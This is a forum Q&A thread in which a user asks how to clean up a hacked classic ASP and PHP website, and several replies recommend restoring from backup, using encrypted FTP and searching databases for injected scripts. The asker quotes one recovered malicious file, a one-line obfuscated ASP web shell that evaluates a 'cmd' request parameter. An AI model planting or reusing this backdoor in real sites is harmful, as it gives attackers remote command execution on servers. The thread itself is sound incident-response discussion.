Solved

Cleaning up a hacked website

Posted on 2015-01-15
8
249 Views
Last Modified: 2015-01-22
I've been assigned to clean up a website that's been hacked somehow.

If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.

After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.

I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.

Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
0
Comment
Question by:Terry Woods
8 Comments
 
LVL 12

Assisted Solution

by:Sommerblink
Sommerblink earned 100 total points
ID: 40552054
I wish I could provide clever answers to your questions, but honestly I treat hacked websites/webservers like I treat virused/malware infected computers, wipe and reload the machine and restore from a known good backup.

Once a machine has been compromised, there is no guarantee that you can catch everything and undo the damage.

Good luck!
0
 
LVL 33

Assisted Solution

by:paulmacd
paulmacd earned 100 total points
ID: 40552065
Code is code and there's rarely a way to define intent without human intervention.  As it is, your best bet is to restore from a known good backup.  If that can't be done, you'll probably have to go through each page, one-at-a-time.  

Be aware the hacker may have compromised the operating system itself.  This wouldn't normally be possible, but if the web site and/or FTP site were running as users with sufficient permissions, the hacker could have put (or written code to put) files anywhere.
0
 
LVL 34

Accepted Solution

by:
gr8gonzo earned 125 total points
ID: 40552171
As a side note - regular FTP is done over plain text. There's no encryption, so anyone that listens to the communication can see the password, no matter how complex / strong it is. Always use SFTP or FTPS (whatever your server supports) for transferring / managing files.

More often than not, hacks are due to vulnerabilities in the code or an unpatched system. Maybe the server hasn't been keeping up with security updates, or maybe you've downloaded some 3rd party code that had a vulnerability in it. For example, PHPMyAdmin was a common script that a lot of people used for years, but there were vulnerabilities in it and people could get hacked just by having it on their web server. There may be ASP equivalents.

ASP.NET code typically is in files with the extension .aspx, while classic ASP uses .asp as the extension.
0
 
LVL 32

Assisted Solution

by:Big Monty
Big Monty earned 125 total points
ID: 40552204
another place you'll want to check is in your database. if you have any kind of data collection (ex - forms) and you don't sanitize the input, hackers in theory could save malicious html and when that data is written out to the screen, you have been hacked.

do a search in any text or varchar fields in your database on the string "<script" (w/out the quotes) and that'll tell you if any bad scripts have been saved to your database
0
Do You Know the 4 Main Threat Actor Types?

Do you know the main threat actor types? Most attackers fall into one of four categories, each with their own favored tactics, techniques, and procedures.

 
LVL 35

Author Comment

by:Terry Woods
ID: 40552236
It's pretty much as I thought then. I'm waiting to see what backups I have available. I suspect I may have to retain the current copy of the databases though, so @Big_Monty's suggestion on what to look for in the databases could be very useful.

I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%

The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.
0
 
LVL 32

Expert Comment

by:Big Monty
ID: 40552262
most likely that page is a hack as well, do a search for that string and some shady sites come up talking about viruses and trojans....
0
 
LVL 52

Assisted Solution

by:Scott Fell, EE MVE
Scott Fell,  EE MVE earned 50 total points
ID: 40558397
It's possible that they used code to create files on the fly.  I would look at the logs too and see if you can find some odd query string requests on a particular page.
0
 
LVL 35

Author Closing Comment

by:Terry Woods
ID: 40563794
Thanks all for your help!
0

Featured Post

Find Ransomware Secrets With All-Source Analysis

Ransomware has become a major concern for organizations; its prevalence has grown due to past successes achieved by threat actors. While each ransomware variant is different, we’ve seen some common tactics and trends used among the authors of the malware.

Join & Write a Comment

Container Orchestration platforms empower organizations to scale their apps at an exceptional rate. This is the reason numerous innovation-driven companies are moving apps to an appropriated datacenter wide platform that empowers them to scale at a …
This story has been written with permission from the scammed victim, a valued client of mine – identity protected by request.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Access reports are powerful and flexible. Learn how to create a query and then a grouped report using the wizard. Modify the report design after the wizard is done to make it look better. There will be another video to explain how to put the final p…

744 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now